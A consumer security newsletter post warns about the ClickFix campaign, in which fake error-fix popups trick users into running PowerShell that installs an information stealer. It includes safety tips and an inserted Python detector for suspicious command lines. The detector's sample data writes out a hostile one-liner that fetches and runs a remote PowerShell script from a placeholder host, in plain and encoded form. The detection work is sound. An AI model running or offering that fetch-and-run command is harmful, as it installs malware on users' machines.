WARNING: Do Not Click This Popup If You See It!

By | June 20, 2024

WARNING: DO NOT CLICK THIS POPUP IF YOU SEE IT! Cloudeight InfoAve

Hackers have devised a new, deceptive method, named ClickFix, to trick users into installing malware, according to cybersecurity firm Proofpoint.

This scheme entices users with fake one-click fixes for common errors in popular programs such as Chrome, OneDrive, and Microsoft Word. Once users download and execute these “fixes” by clicking the “Copy fix” button, they unwittingly run a PowerShell command or a Windows Run command that compromises their systems.

The dialog asks the user to install a “root certificate.” The command behind it flushes the DNS cache, removes the clipboard content, shows a fake message, and installs an additional remote PowerShell script that performs an anti-VM check before the information stealer is installed. Various hacker groups, including those responsible for ClearFake, allegedly use this method. Proofpoint details how hackers exploit compromised sites by injecting a malicious script, delivered through Binance’s Smart Chain contract on the blockchain, to spread malware and infect susceptible Windows computers.

The script performs a series of checks to see if your computer is an acceptable candidate before downloading more payloads. It doesn’t end there: users also need to be aware of an email-based threat that uses HTML attachments made to look like Word documents. These attachments encourage users to download a “Word Online” extension to see the file.
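For readers who manage more than one PC, here is an added example (ours, not code from Proofpoint or from the original article) that checks logged process command lines for the behaviours described above: a DNS cache flush, clipboard clearing, and a remote PowerShell script being fetched and run. The regexes, function names and sample lines are assumptions made for illustration, and the input is assumed to come from process-creation logging such as Windows Security event 4688 or Sysmon event 1. It goes one step beyond the article by also decoding PowerShell's -EncodedCommand form, so the same checks apply to the decoded text.

```python
import base64
import re

# Behaviours the article lists for the pasted command. The regexes are
# assumptions made for this example, not indicators published by Proofpoint.
BEHAVIOURS = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|\bclip(\.exe)?\b", re.I),
    "remote_script": re.compile(
        r"\b(iex|Invoke-Expression)\b.*\b(iwr|irm|Invoke-WebRequest|DownloadString)\b"
        r"|\b(iwr|irm|Invoke-WebRequest|DownloadString)\b.*\|\s*(iex|Invoke-Expression)\b",
        re.I | re.S),
}
# PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...).
ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand(cmdline):
    """Return the command line plus any decoded -EncodedCommand payload."""
    text = cmdline
    for blob in ENCODED.findall(cmdline):
        try:
            text += "\n" + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # not base64 or not UTF-16LE: keep the raw text only
            pass
    return text

def score(cmdline):
    """Sorted names of the listed behaviours found in one PowerShell command line."""
    text = expand(cmdline) if re.search(r"powershell|pwsh", cmdline, re.I) else ""
    return sorted(n for n, rx in BEHAVIOURS.items() if rx.search(text))

def is_suspicious(cmdline):
    """Flag a remote script fetch-and-run combined with at least one other behaviour."""
    hits = score(cmdline)
    return "remote_script" in hits and len(hits) >= 2

# Constructed command lines (not from a real incident); the host is a reserved name.
PASTED = ("ipconfig /flushdns; Set-Clipboard -Value ' '; "
          "iex (iwr 'https://payload.example.invalid/s.ps1')")
SAMPLES = [
    'powershell.exe -w hidden -c "' + PASTED + '"',
    "powershell.exe -NoP -enc " + base64.b64encode(PASTED.encode("utf-16-le")).decode(),
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1",
    "cmd.exe /c ipconfig /flushdns",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_suspicious(line), score(line), line[:60])
```

Only the first two sample lines are flagged; the routine backup script and the plain DNS flush from cmd.exe are not.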

Spreading the Infection:

Proofpoint reveals that attackers exploit compromised websites to inject malicious scripts. These scripts, delivered through Binance’s Smart Chain contract on the blockchain, specifically target Windows machines.

Beyond Pop-Ups: The Email Threat

The ClickFix campaign isn’t limited to pop-ups. Users should also be cautious of emails containing HTML attachments disguised as Word documents. These emails often urge the recipient to download a “Word Online” extension to view the attachment, potentially leading to malware infection.

Helping You to Stay Safe

Don’t Trust Pop-Up “Fixes”: If you encounter error messages within an application, find solutions from the program’s official resources or support pages.

Beware of Suspicious Emails: Don’t open attachments from unknown senders, and be wary of emails urging you to download additional software.

Use Good Security Software: Use a good antivirus/antimalware program, like Emsisoft, and keep it up-to-date.

Always be Vigilant. By being vigilant and practicing safe browsing habits, you can protect yourself from ClickFix and similar malware scams.

3 thoughts on “WARNING: Do Not Click This Popup If You See It!”

  1. Norm Ogier

    Many Thanks for your proactive activity.
    Saving us all once again.
    Well done
